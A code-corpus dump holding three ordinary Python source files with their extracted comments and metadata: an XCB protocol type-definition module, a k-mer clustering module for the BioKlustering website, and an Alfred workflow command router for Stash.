# We dump the _placeholder_byte if any bitcases are added.
for (idx, field) in enumerate(switch_type.bitcases):
if field == _placeholder_byte:
switch_type.bitcases[idx] = new_field
return
switch_type.bitcases.append(new_field)
def resolve(self, module):
if self.resolved:
return
self.expr.resolve(module, self.parents+[self])
# Resolve the bitcase expression
ComplexType.resolve(self, module)
class Reply(ComplexType):
'''
Derived class representing a reply. Only found as a field of Request.
'''
def __init__(self, name, elt):
ComplexType.__init__(self, name, elt)
self.is_reply = True
def resolve(self, module):
if self.resolved:
return
# Add the automatic protocol fields
self.fields.append(Field(tcard8, tcard8.name, 'response_type', False, True, True))
self.fields.append(_placeholder_byte)
self.fields.append(Field(tcard16, tcard16.name, 'sequence', False, True, True))
self.fields.append(Field(tcard32, tcard32.name, 'length', False, True, True))
ComplexType.resolve(self, module)
class Request(ComplexType):
'''
Derived class representing a request.
Public fields added:
reply contains the reply datatype or None for void requests.
opcode contains the request number.
'''
def __init__(self, name, elt):
ComplexType.__init__(self, name, elt)
self.reply = None
self.opcode = elt.get('opcode')
for child in list(elt):
if child.tag == 'reply':
self.reply = Reply(name, child)
def resolve(self, module):
if self.resolved:
return
# Add the automatic protocol fields
if module.namespace.is_ext:
self.fields.append(Field(tcard8, tcard8.name, 'major_opcode', False, True, True))
self.fields.append(Field(tcard8, tcard8.name, 'minor_opcode', False, True, True))
self.fields.append(Field(tcard16, tcard16.name, 'length', False, True, True))
ComplexType.resolve(self, module)
else:
self.fields.append(Field(tcard8, tcard8.name, 'major_opcode', False, True, True))
self.fields.append(_placeholder_byte)
self.fields.append(Field(tcard16, tcard16.name, 'length', False, True, True))
ComplexType.resolve(self, module)
if self.reply:
self.reply.resolve(module)
out = __main__.output['request']
class Event(ComplexType):
'''
Derived class representing an event data type.
Public fields added:
opcodes is a dictionary of name -> opcode number, for eventcopies.
'''
def __init__(self, name, elt):
ComplexType.__init__(self, name, elt)
self.opcodes = {}
tmp = elt.get('no-sequence-number')
self.has_seq = (tmp == None or tmp.lower() == 'false' or tmp == '0')
def add_opcode(self, opcode, name, main):
self.opcodes[name] = opcode
if main:
self.name = name
def resolve(self, module):
if self.resolved:
return
# Add the automatic protocol fields
self.fields.append(Field(tcard8, tcard8.name, 'response_type', False, True, True))
if self.has_seq:
self.fields.append(_placeholder_byte)
self.fields.append(Field(tcard16, tcard16.name, 'sequence', False, True, True))
ComplexType.resolve(self, module)
out = __main__.output['event']
class Error(ComplexType):
'''
Derived class representing an error data type.
Public fields added:
opcodes is a dictionary of name -> opcode number, for errorcopies.
'''
def __init__(self, name, elt):
ComplexType.__init__(self, name, elt)
self.opcodes = {}
def add_opcode(self, opcode, name, main):
self.opcodes[name] = opcode
if main:
self.name = name
def resolve(self, module):
if self.resolved:
return
# Add the automatic protocol fields
self.fields.append(Field(tcard8, tcard8.name, 'response_type', False, True, True))
self.fields.append(Field(tcard8, tcard8.name, 'error_code', False, True, True))
self.fields.append(Field(tcard16, tcard16.name, 'sequence', False, True, True))
ComplexType.resolve(self, module)
out = __main__.output['error']
_placeholder_byte = Field(PadType(None), tcard8.name, 'pad0', False, True, False)
| '''
This module contains the classes which represent XCB data types.
'''
from xcbgen.expr import Field, Expression
import __main__
class Type(object):
'''
Abstract base class for all XCB data types.
Contains default fields, and some abstract methods.
'''
def __init__(self, name):
'''
Default structure initializer. Sets up default fields.
Public fields:
name is a tuple of strings specifying the full type name.
size is the size of the datatype in bytes, or None if variable-sized.
nmemb is 1 for non-list types, None for variable-sized lists, otherwise number of elts.
booleans for identifying subclasses, because I can't figure out isinstance().
'''
self.name = name
self.size = None
self.nmemb = None
self.resolved = False
# Screw isinstance().
self.is_simple = False
self.is_list = False
self.is_expr = False
self.is_container = False
self.is_reply = False
self.is_union = False
self.is_pad = False
self.is_switch = False
self.is_bitcase = False
def resolve(self, module):
'''
Abstract method for resolving a type.
This should make sure any referenced types are already declared.
'''
raise Exception('abstract resolve method not overridden!')
def out(self, name):
'''
Abstract method for outputting code.
These are declared in the language-specific modules, and
there must be a dictionary containing them declared when this module is imported!
'''
raise Exception('abstract out method not overridden!')
def fixed_size(self):
'''
Abstract method for determining if the data type is fixed-size.
'''
raise Exception('abstract fixed_size method not overridden!')
def make_member_of(self, module, complex_type, field_type, field_name, visible, wire, auto):
'''
Default method for making a data type a member of a structure.
Extend this if the data type needs to add an additional length field or something.
module is the global module object.
complex_type is the structure object.
see Field for the meaning of the other parameters.
'''
new_field = Field(self, field_type, field_name, visible, wire, auto)
# We dump the _placeholder_byte if any fields are added.
for (idx, field) in enumerate(complex_type.fields):
if field == _placeholder_byte:
complex_type.fields[idx] = new_field
return
complex_type.fields.append(new_field)
class SimpleType(Type):
'''
Derived class which represents a cardinal type like CARD32 or char.
Any type which is typedef'ed to cardinal will be one of these.
Public fields added:
none
'''
def __init__(self, name, size):
Type.__init__(self, name)
self.is_simple = True
self.size = size
self.nmemb = 1
def resolve(self, module):
self.resolved = True
def fixed_size(self):
return True
out = __main__.output['simple']
# Cardinal datatype globals. See module __init__ method.
tcard8 = SimpleType(('uint8_t',), 1)
tcard16 = SimpleType(('uint16_t',), 2)
tcard32 = SimpleType(('uint32_t',), 4)
tint8 = SimpleType(('int8_t',), 1)
tint16 = SimpleType(('int16_t',), 2)
tint32 = SimpleType(('int32_t',), 4)
tchar = SimpleType(('char',), 1)
tfloat = SimpleType(('float',), 4)
tdouble = SimpleType(('double',), 8)
class Enum(SimpleType):
'''
Derived class which represents an enum. Fixed-size.
Public fields added:
values contains a list of (name, value) tuples. value is empty, or a number.
bits contains a list of (name, bitnum) tuples. items only appear if specified as a bit. bitnum is a number.
'''
def __init__(self, name, elt):
SimpleType.__init__(self, name, 4)
self.values = []
self.bits = []
for item in list(elt):
# First check if we're using a default value
if len(list(item)) == 0:
self.values.append((item.get('name'), ''))
continue
# An explicit value or bit was specified.
value = list(item)[0]
if value.tag == 'value':
self.values.append((item.get('name'), value.text))
elif value.tag == 'bit':
self.values.append((item.get('name'), '%u' % (1 << int(value.text, 0))))
self.bits.append((item.get('name'), value.text))
def resolve(self, module):
self.resolved = True
def fixed_size(self):
return True
out = __main__.output['enum']
class ListType(Type):
'''
Derived class which represents a list of some other datatype. Fixed- or variable-sized.
Public fields added:
member is the datatype of the list elements.
parent is the structure type containing the list.
expr is an Expression object containing the length information, for variable-sized lists.
'''
def __init__(self, elt, member, *parent):
Type.__init__(self, member.name)
self.is_list = True
self.member = member
self.parents = list(parent)
if elt.tag == 'list':
elts = list(elt)
self.expr = Expression(elts[0] if len(elts) else elt, self)
elif elt.tag == 'valueparam':
self.expr = Expression(elt, self)
self.size = member.size if member.fixed_size() else None
self.nmemb = self.expr.nmemb if self.expr.fixed_size() else None
def make_member_of(self, module, complex_type, field_type, field_name, visible, wire, auto):
if not self.fixed_size():
# We need a length field.
# Ask our Expression object for it's name, type, and whether it's on the wire.
lenfid = self.expr.lenfield_type
lenfield_name = self.expr.lenfield_name
lenwire = self.expr.lenwire
needlen = True
# See if the length field is already in the structure.
for parent in self.parents:
for field in parent.fields:
if field.field_name == lenfield_name:
needlen = False
# It isn't, so we need to add it to the structure ourself.
if needlen:
type = module.get_type(lenfid)
lenfield_type = module.get_type_name(lenfid)
type.make_member_of(module, complex_type, lenfield_type, lenfield_name, True, lenwire, False)
# Add ourself to the structure by calling our original method.
Type.make_member_of(self, module, complex_type, field_type, field_name, visible, wire, auto)
def resolve(self, module):
if self.resolved:
return
self.member.resolve(module)
self.expr.resolve(module, self.parents)
# Find my length field again. We need the actual Field object in the expr.
# This is needed because we might have added it ourself above.
if not self.fixed_size():
for parent in self.parents:
for field in parent.fields:
if field.field_name == self.expr.lenfield_name and field.wire:
self.expr.lenfield = field
break
self.resolved = True
def fixed_size(self):
return self.member.fixed_size() and self.expr.fixed_size()
class ExprType(Type):
'''
Derived class which represents an exprfield. Fixed size.
Public fields added:
expr is an Expression object containing the value of the field.
'''
def __init__(self, elt, member, *parents):
Type.__init__(self, member.name)
self.is_expr = True
self.member = member
self.parents = parents
self.expr = Expression(list(elt)[0], self)
self.size = member.size
self.nmemb = 1
def resolve(self, module):
if self.resolved:
return
self.member.resolve(module)
self.resolved = True
def fixed_size(self):
return True
class PadType(Type):
'''
Derived class which represents a padding field.
'''
def __init__(self, elt):
Type.__init__(self, tcard8.name)
self.is_pad = True
self.size = 1
self.nmemb = 1 if (elt == None) else int(elt.get('bytes'), 0)
def resolve(self, module):
self.resolved = True
def fixed_size(self):
return True
class ComplexType(Type):
'''
Derived class which represents a structure. Base type for all structure types.
Public fields added:
fields is an array of Field objects describing the structure fields.
'''
def __init__(self, name, elt):
Type.__init__(self, name)
self.is_container = True
self.elt = elt
self.fields = []
self.nmemb = 1
self.size = 0
self.lenfield_parent = [self]
def resolve(self, module):
if self.resolved:
return
pads = 0
# Resolve all of our field datatypes.
for child in list(self.elt):
if child.tag == 'pad':
field_name = 'pad' + str(pads)
fkey = 'CARD8'
type = PadType(child)
pads = pads + 1
visible = False
elif child.tag == 'field':
field_name = child.get('name')
fkey = child.get('type')
type = module.get_type(fkey)
visible = True
elif child.tag == 'exprfield':
field_name = child.get('name')
fkey = child.get('type')
type = ExprType(child, module.get_type(fkey), *self.lenfield_parent)
visible = False
elif child.tag == 'list':
field_name = child.get('name')
fkey = child.get('type')
type = ListType(child, module.get_type(fkey), *self.lenfield_parent)
visible = True
elif child.tag == 'valueparam':
field_name = child.get('value-list-name')
fkey = 'CARD32'
type = ListType(child, module.get_type(fkey), *self.lenfield_parent)
visible = True
elif child.tag == 'switch':
field_name = child.get('name')
# construct the switch type name from the parent type and the field name
field_type = self.name + (field_name,)
type = SwitchType(field_type, child, *self.lenfield_parent)
visible = True
type.make_member_of(module, self, field_type, field_name, visible, True, False)
type.resolve(module)
continue
else:
# Hit this on Reply
continue
# Get the full type name for the field
field_type = module.get_type_name(fkey)
# Add the field to ourself
type.make_member_of(module, self, field_type, field_name, visible, True, False)
# Recursively resolve the type (could be another structure, list)
type.resolve(module)
self.calc_size() # Figure out how big we are
self.resolved = True
def calc_size(self):
self.size = 0
for m in self.fields:
if not m.wire:
continue
if m.type.fixed_size():
self.size = self.size + (m.type.size * m.type.nmemb)
else:
self.size = None
break
def fixed_size(self):
for m in self.fields:
if not m.type.fixed_size():
return False
return True
class SwitchType(ComplexType):
'''
Derived class which represents a List of Items.
Public fields added:
bitcases is an array of Bitcase objects describing the list items
'''
def __init__(self, name, elt, *parents):
ComplexType.__init__(self, name, elt)
self.parents = parents
# FIXME: switch cannot store lenfields, so it should just delegate the parents
self.lenfield_parent = list(parents) + [self]
# self.fields contains all possible fields collected from the Bitcase objects,
# whereas self.items contains the Bitcase objects themselves
self.bitcases = []
self.is_switch = True
elts = list(elt)
self.expr = Expression(elts[0] if len(elts) else elt, self)
def resolve(self, module):
if self.resolved:
return
# pads = 0
parents = list(self.parents) + [self]
# Resolve all of our field datatypes.
for index, child in enumerate(list(self.elt)):
if child.tag == 'bitcase':
field_name = child.get('name')
if field_name is None:
field_type = self.name + ('bitcase%d' % index,)
else:
field_type = self.name + (field_name,)
# use self.parent to indicate anchestor,
# as switch does not contain named fields itself
type = BitcaseType(index, field_type, child, *parents)
# construct the switch type name from the parent type and the field name
if field_name is None:
type.has_name = False
# Get the full type name for the field
field_type = type.name
visible = True
# add the field to ourself
type.make_member_of(module, self, field_type, field_name, visible, True, False)
# recursively resolve the type (could be another structure, list)
type.resolve(module)
inserted = False
for new_field in type.fields:
# We dump the _placeholder_byte if any fields are added.
for (idx, field) in enumerate(self.fields):
if field == _placeholder_byte:
self.fields[idx] = new_field
inserted = True
break
if False == inserted:
self.fields.append(new_field)
self.calc_size() # Figure out how big we are
self.resolved = True
def make_member_of(self, module, complex_type, field_type, field_name, visible, wire, auto):
if not self.fixed_size():
# We need a length field.
# Ask our Expression object for it's name, type, and whether it's on the wire.
lenfid = self.expr.lenfield_type
lenfield_name = self.expr.lenfield_name
lenwire = self.expr.lenwire
needlen = True
# See if the length field is already in the structure.
for parent in self.parents:
for field in parent.fields:
if field.field_name == lenfield_name:
needlen = False
# It isn't, so we need to add it to the structure ourself.
if needlen:
type = module.get_type(lenfid)
lenfield_type = module.get_type_name(lenfid)
type.make_member_of(module, complex_type, lenfield_type, lenfield_name, True, lenwire, False)
# Add ourself to the structure by calling our original method.
Type.make_member_of(self, module, complex_type, field_type, field_name, visible, wire, auto)
# size for switch can only be calculated at runtime
def calc_size(self):
pass
# note: switch is _always_ of variable size, but we indicate here wether
# it contains elements that are variable-sized themselves
def fixed_size(self):
return False
# for m in self.fields:
# if not m.type.fixed_size():
# return False
# return True
class Struct(ComplexType):
'''
Derived class representing a struct data type.
'''
out = __main__.output['struct']
class Union(ComplexType):
'''
Derived class representing a union data type.
'''
def __init__(self, name, elt):
ComplexType.__init__(self, name, elt)
self.is_union = True
out = __main__.output['union']
class BitcaseType(ComplexType):
'''
Derived class representing a struct data type.
'''
def __init__(self, index, name, elt, *parent):
elts = list(elt)
self.expr = Expression(elts[0] if len(elts) else elt, self)
ComplexType.__init__(self, name, elts[1:])
self.has_name = True
self.index = 1
self.lenfield_parent = list(parent) + [self]
self.parents = list(parent)
self.is_bitcase = True
def make_member_of(self, module, switch_type, field_type, field_name, visible, wire, auto):
'''
register BitcaseType with the corresponding SwitchType
module is the global module object.
complex_type is the structure object.
see Field for the meaning of the other parameters.
'''
new_field = Field(self, field_type, field_name, visible, wire, auto)
# We dump the _placeholder_byte if any bitcases are added.
for (idx, field) in enumerate(switch_type.bitcases):
if field == _placeholder_byte:
switch_type.bitcases[idx] = new_field
return
switch_type.bitcases.append(new_field)
def resolve(self, module):
if self.resolved:
return
self.expr.resolve(module, self.parents+[self])
# Resolve the bitcase expression
ComplexType.resolve(self, module)
class Reply(ComplexType):
'''
Derived class representing a reply. Only found as a field of Request.
'''
def __init__(self, name, elt):
ComplexType.__init__(self, name, elt)
self.is_reply = True
def resolve(self, module):
if self.resolved:
return
# Add the automatic protocol fields
self.fields.append(Field(tcard8, tcard8.name, 'response_type', False, True, True))
self.fields.append(_placeholder_byte)
self.fields.append(Field(tcard16, tcard16.name, 'sequence', False, True, True))
self.fields.append(Field(tcard32, tcard32.name, 'length', False, True, True))
ComplexType.resolve(self, module)
class Request(ComplexType):
'''
Derived class representing a request.
Public fields added:
reply contains the reply datatype or None for void requests.
opcode contains the request number.
'''
def __init__(self, name, elt):
ComplexType.__init__(self, name, elt)
self.reply = None
self.opcode = elt.get('opcode')
for child in list(elt):
if child.tag == 'reply':
self.reply = Reply(name, child)
def resolve(self, module):
if self.resolved:
return
# Add the automatic protocol fields
if module.namespace.is_ext:
self.fields.append(Field(tcard8, tcard8.name, 'major_opcode', False, True, True))
self.fields.append(Field(tcard8, tcard8.name, 'minor_opcode', False, True, True))
self.fields.append(Field(tcard16, tcard16.name, 'length', False, True, True))
ComplexType.resolve(self, module)
else:
self.fields.append(Field(tcard8, tcard8.name, 'major_opcode', False, True, True))
self.fields.append(_placeholder_byte)
self.fields.append(Field(tcard16, tcard16.name, 'length', False, True, True))
ComplexType.resolve(self, module)
if self.reply:
self.reply.resolve(module)
out = __main__.output['request']
class Event(ComplexType):
'''
Derived class representing an event data type.
Public fields added:
opcodes is a dictionary of name -> opcode number, for eventcopies.
'''
def __init__(self, name, elt):
ComplexType.__init__(self, name, elt)
self.opcodes = {}
tmp = elt.get('no-sequence-number')
self.has_seq = (tmp == None or tmp.lower() == 'false' or tmp == '0')
def add_opcode(self, opcode, name, main):
self.opcodes[name] = opcode
if main:
self.name = name
def resolve(self, module):
if self.resolved:
return
# Add the automatic protocol fields
self.fields.append(Field(tcard8, tcard8.name, 'response_type', False, True, True))
if self.has_seq:
self.fields.append(_placeholder_byte)
self.fields.append(Field(tcard16, tcard16.name, 'sequence', False, True, True))
ComplexType.resolve(self, module)
out = __main__.output['event']
class Error(ComplexType):
'''
Derived class representing an error data type.
Public fields added:
opcodes is a dictionary of name -> opcode number, for errorcopies.
'''
def __init__(self, name, elt):
ComplexType.__init__(self, name, elt)
self.opcodes = {}
def add_opcode(self, opcode, name, main):
self.opcodes[name] = opcode
if main:
self.name = name
def resolve(self, module):
if self.resolved:
return
# Add the automatic protocol fields
self.fields.append(Field(tcard8, tcard8.name, 'response_type', False, True, True))
self.fields.append(Field(tcard8, tcard8.name, 'error_code', False, True, True))
self.fields.append(Field(tcard16, tcard16.name, 'sequence', False, True, True))
ComplexType.resolve(self, module)
out = __main__.output['error']
_placeholder_byte = Field(PadType(None), tcard8.name, 'pad0', False, True, False)
| en | 0.850046 | This module contains the classes which represent XCB data types. Abstract base class for all XCB data types. Contains default fields, and some abstract methods. Default structure initializer. Sets up default fields. Public fields: name is a tuple of strings specifying the full type name. size is the size of the datatype in bytes, or None if variable-sized. nmemb is 1 for non-list types, None for variable-sized lists, otherwise number of elts. booleans for identifying subclasses, because I can't figure out isinstance(). # Screw isinstance(). Abstract method for resolving a type. This should make sure any referenced types are already declared. Abstract method for outputting code. These are declared in the language-specific modules, and there must be a dictionary containing them declared when this module is imported! Abstract method for determining if the data type is fixed-size. Default method for making a data type a member of a structure. Extend this if the data type needs to add an additional length field or something. module is the global module object. complex_type is the structure object. see Field for the meaning of the other parameters. # We dump the _placeholder_byte if any fields are added. Derived class which represents a cardinal type like CARD32 or char. Any type which is typedef'ed to cardinal will be one of these. Public fields added: none # Cardinal datatype globals. See module __init__ method. Derived class which represents an enum. Fixed-size. Public fields added: values contains a list of (name, value) tuples. value is empty, or a number. bits contains a list of (name, bitnum) tuples. items only appear if specified as a bit. bitnum is a number. # First check if we're using a default value # An explicit value or bit was specified. Derived class which represents a list of some other datatype. Fixed- or variable-sized. Public fields added: member is the datatype of the list elements. parent is the structure type containing the list. expr is an Expression object containing the length information, for variable-sized lists. # We need a length field. # Ask our Expression object for it's name, type, and whether it's on the wire. # See if the length field is already in the structure. # It isn't, so we need to add it to the structure ourself. # Add ourself to the structure by calling our original method. # Find my length field again. We need the actual Field object in the expr. # This is needed because we might have added it ourself above. Derived class which represents an exprfield. Fixed size. Public fields added: expr is an Expression object containing the value of the field. Derived class which represents a padding field. Derived class which represents a structure. Base type for all structure types. Public fields added: fields is an array of Field objects describing the structure fields. # Resolve all of our field datatypes. # construct the switch type name from the parent type and the field name # Hit this on Reply # Get the full type name for the field # Add the field to ourself # Recursively resolve the type (could be another structure, list) # Figure out how big we are Derived class which represents a List of Items. Public fields added: bitcases is an array of Bitcase objects describing the list items # FIXME: switch cannot store lenfields, so it should just delegate the parents # self.fields contains all possible fields collected from the Bitcase objects, # whereas self.items contains the Bitcase objects themselves # pads = 0 # Resolve all of our field datatypes. # use self.parent to indicate anchestor, # as switch does not contain named fields itself # construct the switch type name from the parent type and the field name # Get the full type name for the field # add the field to ourself # recursively resolve the type (could be another structure, list) # We dump the _placeholder_byte if any fields are added. # Figure out how big we are # We need a length field. # Ask our Expression object for it's name, type, and whether it's on the wire. # See if the length field is already in the structure. # It isn't, so we need to add it to the structure ourself. # Add ourself to the structure by calling our original method. # size for switch can only be calculated at runtime # note: switch is _always_ of variable size, but we indicate here wether # it contains elements that are variable-sized themselves # for m in self.fields: # if not m.type.fixed_size(): # return False # return True Derived class representing a struct data type. Derived class representing a union data type. Derived class representing a struct data type. register BitcaseType with the corresponding SwitchType module is the global module object. complex_type is the structure object. see Field for the meaning of the other parameters. # We dump the _placeholder_byte if any bitcases are added. # Resolve the bitcase expression Derived class representing a reply. Only found as a field of Request. # Add the automatic protocol fields Derived class representing a request. Public fields added: reply contains the reply datatype or None for void requests. opcode contains the request number. # Add the automatic protocol fields Derived class representing an event data type. Public fields added: opcodes is a dictionary of name -> opcode number, for eventcopies. # Add the automatic protocol fields Derived class representing an error data type. Public fields added: opcodes is a dictionary of name -> opcode number, for errorcopies. # Add the automatic protocol fields | 3.120223 | 3 |
BioKlustering-Website/mlmodel/parser/kmeans.py | solislemuslab/mycovirus-website | 1 | 10325 | # Copyright 2020 by <NAME>, Solis-Lemus Lab, WID.
# All rights reserved.
# This file is part of the BioKlustering Website.
import pandas as pd
from Bio import SeqIO
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from sklearn.cluster import MeanShift
from sklearn import preprocessing
import numpy as np
import os
from .helpers import plotly_dash_show_plot
def parseFasta(data):
d = {fasta.id : str(fasta.seq) for fasta in SeqIO.parse(data, "fasta")}
pd.DataFrame([d])
s = pd.Series(d, name='Sequence')
s.index.name = 'ID'
s.reset_index()
return pd.DataFrame(s)
def kmerXTable(s, a, b):
tfid_vector = TfidfVectorizer(analyzer='char', ngram_range=(a,b))
s_hat = tfid_vector.fit_transform(s.Sequence)
kmerNames = tfid_vector.get_feature_names()
kmers = s_hat.toarray()
return pd.DataFrame(kmers,columns=kmerNames, index = s.index)
# credit to chunrong
def read_fasta_sequences(sequence_paths):
all_sequences = pd.DataFrame()
for path in sequence_paths:
path = os.path.join("media", path)
sequence = parseFasta(path)
all_sequences = pd.concat([all_sequences, sequence])
return all_sequences
def kmeans(userId, fasta, klength_min, klength_max, rNum, cNum, method):
inputData = read_fasta_sequences(fasta)
inputData["Sequence"] = inputData["Sequence"].apply(lambda x: x.replace("-", ""))
kmerXTableInput = kmerXTable(inputData, klength_min, klength_max)
km = KMeans(random_state = rNum, n_clusters = cNum)
km.fit(kmerXTableInput)
y_hat = km.predict(kmerXTableInput)
plotly_kmertable = kmerXTableInput
if method == "PCA":
plotly_kmertable = preprocessing.normalize(kmerXTableInput)
plot_div = plotly_dash_show_plot(userId, plotly_kmertable, y_hat, "Unsupervised Kmeans", method)
inputData.insert(0, "Labels", y_hat)
return [[inputData], [plot_div]]
def kmeans_semiSupervised(userId, fasta, klength_min, klength_max, rNum, y_hat, method):
inputData = read_fasta_sequences(fasta)
inputData["Sequence"] = inputData["Sequence"].apply(lambda x: x.replace("-", ""))
kmerXTableInput = kmerXTable(inputData, klength_min, klength_max)
PCAembedding = PCA(n_components=10)
NkmerXTableInput = preprocessing.normalize(kmerXTableInput)
PCAembedding_low = PCAembedding.fit_transform(NkmerXTableInput)
ms = MeanShift()
ms.fit(PCAembedding_low)
cluster_centers = ms.cluster_centers_
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
kmms = KMeans(init = cluster_centers, n_clusters = len(cluster_centers))
kmms_labels = kmms.fit_predict(PCAembedding_low)
# convert all clusters into two clusters
kmerXTableInput["pLabels"] = kmms_labels
kmerXTableInput["aLabels"] = y_hat.tolist()
newLabels_clusters_1 = kmerXTableInput[kmerXTableInput["aLabels"] == 1]["pLabels"].tolist()
newLabels_clusters_0 = kmerXTableInput[kmerXTableInput["aLabels"] == 0]["pLabels"].tolist()
newLabels = []
for label in kmms_labels:
if newLabels_clusters_1.count(label) > newLabels_clusters_0.count(label):
newLabels.append(1)
else:
newLabels.append(0)
kmerTable = kmerXTableInput.drop(columns=["pLabels", "aLabels"])
plotly_kmertable = kmerTable
plotly_labels = np.array(newLabels)
if method == "PCA":
plotly_kmertable = preprocessing.normalize(kmerTable)
plotly_div = plotly_dash_show_plot(userId, plotly_kmertable, plotly_labels, "Semi-supervised Kmeans", method)
inputData.insert(0, "Labels", newLabels)
return [[inputData], [plotly_div]]
| # Copyright 2020 by <NAME>, Solis-Lemus Lab, WID.
# All rights reserved.
# This file is part of the BioKlustering Website.
import pandas as pd
from Bio import SeqIO
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from sklearn.cluster import MeanShift
from sklearn import preprocessing
import numpy as np
import os
from .helpers import plotly_dash_show_plot
def parseFasta(data):
d = {fasta.id : str(fasta.seq) for fasta in SeqIO.parse(data, "fasta")}
pd.DataFrame([d])
s = pd.Series(d, name='Sequence')
s.index.name = 'ID'
s.reset_index()
return pd.DataFrame(s)
def kmerXTable(s, a, b):
tfid_vector = TfidfVectorizer(analyzer='char', ngram_range=(a,b))
s_hat = tfid_vector.fit_transform(s.Sequence)
kmerNames = tfid_vector.get_feature_names()
kmers = s_hat.toarray()
return pd.DataFrame(kmers,columns=kmerNames, index = s.index)
# credit to chunrong
def read_fasta_sequences(sequence_paths):
all_sequences = pd.DataFrame()
for path in sequence_paths:
path = os.path.join("media", path)
sequence = parseFasta(path)
all_sequences = pd.concat([all_sequences, sequence])
return all_sequences
def kmeans(userId, fasta, klength_min, klength_max, rNum, cNum, method):
inputData = read_fasta_sequences(fasta)
inputData["Sequence"] = inputData["Sequence"].apply(lambda x: x.replace("-", ""))
kmerXTableInput = kmerXTable(inputData, klength_min, klength_max)
km = KMeans(random_state = rNum, n_clusters = cNum)
km.fit(kmerXTableInput)
y_hat = km.predict(kmerXTableInput)
plotly_kmertable = kmerXTableInput
if method == "PCA":
plotly_kmertable = preprocessing.normalize(kmerXTableInput)
plot_div = plotly_dash_show_plot(userId, plotly_kmertable, y_hat, "Unsupervised Kmeans", method)
inputData.insert(0, "Labels", y_hat)
return [[inputData], [plot_div]]
def kmeans_semiSupervised(userId, fasta, klength_min, klength_max, rNum, y_hat, method):
inputData = read_fasta_sequences(fasta)
inputData["Sequence"] = inputData["Sequence"].apply(lambda x: x.replace("-", ""))
kmerXTableInput = kmerXTable(inputData, klength_min, klength_max)
PCAembedding = PCA(n_components=10)
NkmerXTableInput = preprocessing.normalize(kmerXTableInput)
PCAembedding_low = PCAembedding.fit_transform(NkmerXTableInput)
ms = MeanShift()
ms.fit(PCAembedding_low)
cluster_centers = ms.cluster_centers_
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
kmms = KMeans(init = cluster_centers, n_clusters = len(cluster_centers))
kmms_labels = kmms.fit_predict(PCAembedding_low)
# convert all clusters into two clusters
kmerXTableInput["pLabels"] = kmms_labels
kmerXTableInput["aLabels"] = y_hat.tolist()
newLabels_clusters_1 = kmerXTableInput[kmerXTableInput["aLabels"] == 1]["pLabels"].tolist()
newLabels_clusters_0 = kmerXTableInput[kmerXTableInput["aLabels"] == 0]["pLabels"].tolist()
newLabels = []
for label in kmms_labels:
if newLabels_clusters_1.count(label) > newLabels_clusters_0.count(label):
newLabels.append(1)
else:
newLabels.append(0)
kmerTable = kmerXTableInput.drop(columns=["pLabels", "aLabels"])
plotly_kmertable = kmerTable
plotly_labels = np.array(newLabels)
if method == "PCA":
plotly_kmertable = preprocessing.normalize(kmerTable)
plotly_div = plotly_dash_show_plot(userId, plotly_kmertable, plotly_labels, "Semi-supervised Kmeans", method)
inputData.insert(0, "Labels", newLabels)
return [[inputData], [plotly_div]]
| en | 0.861432 | # Copyright 2020 by <NAME>, Solis-Lemus Lab, WID. # All rights reserved. # This file is part of the BioKlustering Website. # credit to chunrong # convert all clusters into two clusters | 2.48096 | 2 |
workflow/src/routing.py | mibexsoftware/alfred-stash-workflow | 13 | 10326 | # -*- coding: utf-8 -*-
from src import icons, __version__
from src.actions import HOST_URL
from src.actions.configure import ConfigureWorkflowAction
from src.actions.help import HelpWorkflowAction
from src.actions.index import IndexWorkflowAction
from src.actions.projects import ProjectWorkflowAction
from src.actions.pull_requests import PullRequestWorkflowAction
from src.actions.repositories import RepositoryWorkflowAction
from src.util import workflow, call_alfred
WORKFLOW_ACTIONS = {
':config': ConfigureWorkflowAction,
':projects': ProjectWorkflowAction,
':repos': RepositoryWorkflowAction,
':pullrequests': PullRequestWorkflowAction,
':help': HelpWorkflowAction
}
def route(args): # e.g., args = ":config sethost http://localhost,--exec"
command_string = args[0] # :config sethost http://localhost
command = command_string.split(' ')
if not workflow().settings.get(HOST_URL, None) and 'sethost' not in command:
call_alfred('stash:config sethost ')
return
handler = IndexWorkflowAction
action = next(iter(command), None)
if action:
handler = WORKFLOW_ACTIONS.get(action, IndexWorkflowAction)
if '--exec' in args:
handler().execute(command, cmd_pressed='--cmd' in args, shift_pressed='--shift' in args)
else: # show menu
handler().menu(command)
_notify_if_upgrade_available()
workflow().send_feedback()
def _notify_if_upgrade_available():
if workflow().update_available:
new_version = workflow().cached_data('__workflow_update_status', max_age=0)['version']
workflow().add_item('An update is available!',
'Update the workflow from version {} to {}'.format(__version__, new_version),
arg=':config update',
valid=True,
icon=icons.UPDATE)
| # -*- coding: utf-8 -*-
from src import icons, __version__
from src.actions import HOST_URL
from src.actions.configure import ConfigureWorkflowAction
from src.actions.help import HelpWorkflowAction
from src.actions.index import IndexWorkflowAction
from src.actions.projects import ProjectWorkflowAction
from src.actions.pull_requests import PullRequestWorkflowAction
from src.actions.repositories import RepositoryWorkflowAction
from src.util import workflow, call_alfred
WORKFLOW_ACTIONS = {
':config': ConfigureWorkflowAction,
':projects': ProjectWorkflowAction,
':repos': RepositoryWorkflowAction,
':pullrequests': PullRequestWorkflowAction,
':help': HelpWorkflowAction
}
def route(args): # e.g., args = ":config sethost http://localhost,--exec"
command_string = args[0] # :config sethost http://localhost
command = command_string.split(' ')
if not workflow().settings.get(HOST_URL, None) and 'sethost' not in command:
call_alfred('stash:config sethost ')
return
handler = IndexWorkflowAction
action = next(iter(command), None)
if action:
handler = WORKFLOW_ACTIONS.get(action, IndexWorkflowAction)
if '--exec' in args:
handler().execute(command, cmd_pressed='--cmd' in args, shift_pressed='--shift' in args)
else: # show menu
handler().menu(command)
_notify_if_upgrade_available()
workflow().send_feedback()
def _notify_if_upgrade_available():
if workflow().update_available:
new_version = workflow().cached_data('__workflow_update_status', max_age=0)['version']
workflow().add_item('An update is available!',
'Update the workflow from version {} to {}'.format(__version__, new_version),
arg=':config update',
valid=True,
icon=icons.UPDATE)
| en | 0.451041 | # -*- coding: utf-8 -*- # e.g., args = ":config sethost http://localhost,--exec" # :config sethost http://localhost # show menu | 1.983528 | 2 |
